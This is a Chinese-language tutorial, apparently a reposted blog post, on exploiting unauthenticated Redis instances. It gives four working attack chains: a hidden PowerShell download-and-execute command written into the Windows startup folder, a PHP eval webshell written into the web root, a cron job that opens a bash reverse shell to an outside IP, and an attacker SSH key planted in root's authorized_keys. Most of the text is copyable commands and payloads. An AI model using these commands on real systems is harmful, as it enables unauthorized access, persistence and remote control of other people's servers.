文章目錄
- windows利用方法
- 啟動項
- webshell寫入
- linux利用方法
- 計劃任務
- ssh公私鑰
windows利用方法
通過埠掃描掃描到靶機開放6379
啟動項
通過寫入到windows啟動項進行開機自啟動提權
通過未授權訪問進行連接,輸入info查看是否連接成功
成功以后搞一個cs監聽
生成一個powershell釣魚命令
powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://xx.xx.xx.xx:80/a’))”
通過redis未授權訪問漏洞設定寫入路徑
config set dir “C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/”
設定寫入檔案
config set dbfilename 1.bat
這里看了一下網上,發現復制的都是錯的,后來發現"閉合問題使用\注釋之后才可正常寫入能上線的powershell
set x “\r\n\r\npowershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://xx.xx.xx.xx/a’))”\r\n\r\n”
save
重啟之后直接上線
webshell寫入
此處linux和windows一樣就不在linux復現了
寫入webshell
設定寫入web路徑
config set dir c:/phpstudy/www
設定寫入檔案
config set dbfilename shell.php
寫入內容
set x “<php @eval($_POST[‘swzaq’]) ?>”
save
連接webshell
linux利用方法
計劃任務
獲取info資訊
監聽埠444
執行如下命令大概一分鐘內反彈shell
set xxx “\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.0.105/444 0>&1\n\n”
config set dir /var/spool/cron
config set dbfilename root
save
ssh公私鑰
使用客戶端生成私鑰
ssh-keygen -t rsa
將生成的公鑰保存成1.txt
(echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > 1.txt
將保存的公鑰1.txt寫入redis
cat 1.txt | redis-cli -h 10.10.10.135 -x set crack
更改redis備份檔案路徑,設定上傳檔案名為authorized_keys
config set dir /root/.ssh
CONFIG SET dbfilename authorized_keys
save保存之后直接ssh -i id_rsa root@192.168.80.130登錄
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/290778.html
標籤:其他
下一篇:2021年深圳杯數學建模